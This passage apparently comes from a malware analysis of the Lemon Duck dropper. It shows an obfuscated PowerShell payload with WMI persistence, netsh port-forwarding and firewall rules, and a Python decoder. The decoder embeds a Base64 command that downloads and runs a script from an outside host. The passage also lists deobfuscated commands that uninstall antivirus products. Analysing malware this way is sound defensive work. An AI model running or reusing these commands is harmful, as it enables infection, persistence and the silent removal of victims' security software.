__InstanceModificatfU+tfUtiotfU+t'+'fUnEvent WITHIN 3600 WHERE tfU+'+'tfUTargetIn'+'stantfU+tfUce ISA uOsWin32_PerfFormat'+'tedDatatfU+tfU_PertfU+tfUfOS_SystemuOscFw;} -ErrorAt'+'fU+tfUctio'+'n Stop);Consu'+'mer=(Set-WmiInstance -Class CotfU+tfU'+'mmandLineEventConsume'+'r '+'-NamespactfU+tfUe cFwrotfU+tfUot9RTsubscriptioncFw -Arguments @{Name=cFwcc'+'Fw+CdJtheN'+'am'+'e;ExecutablePath=cFwc:9RTwindows9RTsystem329RTcmd.execFw;CommandLineTe'+'mplate=cFw/c power'+'shell -w hidden -c '+'CdJw'+'micmdcFtfU+'+'tfU'+'w})}        start'+'-sleep 5'+'  '+'  '+'}tfU+tfU    cmd'+'.exe /c netsh.exe firewall add portopening tcp'+' 65529 SDNSd    netsh.exe intertfU+tfUface tfU+tfUptfU+tfUortproxy add v4tov4 listenport=65529 ctfU+tfUonnectaddress=1.1.1.1 connectport=53    netsh advfirewtfU+tfUall firewall ad'+'d rule name=ctfU+tfUFwde'+'ny4'+'45cFw dir=in protocol='+'tcp tfU+tfUlocalport=445 action=block    netsh advfirewall firewall add rule tfU+tf'+'Uname=cFwdeny135c'+'tfU+tfUF'+'w dir=in protocol='+'t'+'cp lo'+'calport=135 ac'+'tion=block    Set-ItemProperty -Path cFwHKLM:9RTSYSTEM9RTCurrentControlSet9RTServices9RTLanmanServer9RTParame'+'ter'+'scFw DisableCompression -Type tfU+'+'tfUDWORD -Valu'+'e 1 ???Force}schtasks /delete /tfU+tfUtn Rtsa2 /F'+'schtasks /deletfU+tfUte /tn Rtsa1 /Fschtasks /delete /tn Rtsa /FtfU)-cREplaCe  ([CHaR]1'+'02+[CHaR]118+[CHaR]11'+'2),[CHaR]96  -RepLaCE tfU9RTtfU,[CH'+'aR]92 '+'-cREplaCetfUCdJtfU,[CHaR]36-RepLaCEtfUTjQtfU,[CHa'+'R]124 -cREplaCe'+' ([CHaR]117+[CHaR]7'+'9+[CHaR]115),[CHa'+'R]39-R'+'epLaCE([CHa'+'R]99+[C'+'HaR]70+[CHaR]119),[CHaR]34) )'+'') -ReplaCE  'tfU',[CHaR]39  -ReplaCE  'hCN',[CHaR]36)| &( $pShOMe[21]+$PSHOme[34]+'x')" =  lh2$
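To reproduce the three decoding stages walked through above (the `-e` argument, the hex-encoded Deflate stream in gim.jsp, and the reversed, token-substituted `$2hl` string) with reusable helpers, here is an added Python example that is not part of the original post. The Base64 argument and the avp uninstall fragment are taken from this page; the Deflate sample is constructed because the page's hex blob is too long to embed, and the token table is read off the `-replace` calls at the end of the reversed script.

```python
"""Decoders for the three encoding layers in the Lemon Duck dropper above."""
import base64
import zlib

# Stage 1: the `powershell -e` argument from 1.txt (Base64 over UTF-16LE).
PAGE_ENCODED_CMD = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgA"
    "LgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA=="
)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is Base64 of the UTF-16LE script, so decode it as such;
    an ASCII decode only yields NUL-interleaved text."""
    return base64.b64decode(b64).decode("utf-16-le")


# Stage 2: gim.jsp splits a hex string into byte pairs (-split '(..)'), feeds
# them to IO.Compression.DeflateStream and reads the result as ASCII. .NET's
# DeflateStream is raw Deflate (RFC 1951, no zlib header): wbits=-15 here.
def decode_hex_deflate(hex_blob: str) -> str:
    raw = bytes(int(hex_blob[i:i + 2], 16) for i in range(0, len(hex_blob), 2))
    return zlib.decompress(raw, -15).decode("ascii")


def encode_hex_deflate(script: str) -> str:
    """Inverse of the loader; only used to build the constructed sample."""
    c = zlib.compressobj(level=9, wbits=-15)
    return (c.compress(script.encode("ascii")) + c.flush()).hex()


# Constructed stand-in for the page's far longer hex blob (example.invalid
# is a reserved, non-resolving name).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.jsp')"
SAMPLE_HEX = encode_hex_deflate(SAMPLE_SCRIPT)

# Stage 3: $2hl is stored reversed, chopped into '...'+'...' fragments, and has
# its quote, dollar, pipe, backslash and backtick characters swapped for
# three-letter tokens. The script undoes this in two nested -replace stages;
# the pairs below are read off those calls ([CHaR]n is the character code).
OUTER_TOKENS = [("tfU", "'"), ("hCN", "$")]
INNER_TOKENS = [("fvp", "`"), ("9RT", "\\"), ("CdJ", "$"),
                ("TjQ", "|"), ("uOs", "'"), ("cFw", '"')]


def _join_fragments(text: str) -> str:
    # '...'+'...' concatenation can cut a token in half (e.g. Cd'+'Jc), so the
    # fragments must be joined before any token is replaced.
    return text.replace("'+'", "")


def deobfuscate_2hl(stored: str) -> str:
    text = stored[::-1]                     # undo the [-1..-length] -join ''
    text = _join_fragments(text)            # outer '+' concatenation
    for token, char in OUTER_TOKENS:
        text = text.replace(token, char)    # inner quotes are now real quotes
    text = _join_fragments(text)            # inner '+' concatenation
    for token, char in INNER_TOKENS:        # mix of -creplace/-replace in the
        text = text.replace(token, char)    # script; these tokens never collide
    return text


# The avp uninstall segment exactly as it sits in the reversed $2hl string.
PAGE_REVERSED_FRAGMENT = ("Uft+Uftl'+'latsninu llUft+Uftac wF'+'csOu%pva%sOu ekil "
                          "emanwFcU'+'ft+Uft ereh'+'w tcudorpUft+Uft exe.cimw b/ trats c/ dmc")


if __name__ == "__main__":
    print(decode_encoded_command(PAGE_ENCODED_CMD))
    print(decode_hex_deflate(SAMPLE_HEX))
    print(deobfuscate_2hl(PAGE_REVERSED_FRAGMENT))
```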

Continuing to strip the obfuscation gives the following

cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractivecmd /